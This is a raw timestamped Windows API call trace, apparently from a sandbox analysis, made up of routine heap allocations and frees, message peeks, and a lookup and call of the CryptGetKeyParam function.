[0084.072] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0084.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0084.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0084.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0084.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0084.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0084.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0084.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0084.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0084.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0084.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0084.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0084.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0084.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0084.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0084.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0084.072] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0084.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0084.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0084.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0084.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0084.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0084.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0084.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0084.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0084.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0084.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0084.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0084.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0084.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0084.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0084.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0084.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0084.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0084.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0084.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0084.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0084.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0084.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0084.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0084.073] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0084.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0084.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0084.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0084.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0084.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0084.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0084.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0084.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0084.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0084.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0084.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0084.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0084.074] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0084.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0084.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0084.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac40 [0084.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0084.074] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0084.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0084.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0084.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0084.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0084.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0084.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0084.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0084.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0084.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0084.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0084.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0084.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0084.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0084.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0084.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0084.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0084.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0084.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0084.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0084.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0084.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0084.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0084.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0084.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0084.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0084.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0084.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0084.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0084.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0084.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0084.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0084.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0084.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0084.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0084.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0084.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0084.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0084.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e28 [0084.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0084.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0084.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0084.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0084.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0084.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0084.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0084.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0084.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0084.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0084.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0084.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0084.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0084.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0084.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0084.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0084.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0084.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0084.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0084.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0084.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0084.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0084.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0084.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0084.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0084.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0084.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0084.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0084.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0084.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0084.076] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0084.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0084.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0084.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0084.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0084.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0084.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0084.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0084.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0084.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0084.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0084.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0084.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0084.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0084.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0084.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0084.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0084.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0084.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0084.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0084.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0084.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0084.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0084.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0084.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0084.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0084.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797088, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0084.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0084.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0084.078] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0084.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0084.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0084.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0084.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0084.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0084.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0084.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0084.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0084.078] CryptGetKeyParam (in: hKey=0x41ac700, dwParam=0x7, pbData=0x43e2650, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2650*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0084.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0084.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0084.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0084.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0084.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0084.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0084.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0084.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0084.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0084.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0084.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0084.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0084.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0084.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0084.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0084.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0084.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0084.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0084.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0084.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0084.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0084.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0084.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0084.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0084.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0084.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0084.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0084.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0084.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0084.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0084.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0084.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0084.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0084.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0084.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0084.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0084.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0084.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0084.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0084.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0084.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0084.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0084.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0084.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0084.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0084.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0084.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0084.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0084.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0084.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0084.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0084.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0084.080] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0084.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0084.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0084.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0084.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0084.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0084.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0084.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0084.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0084.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0084.081] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0084.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0084.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0084.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0084.081] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 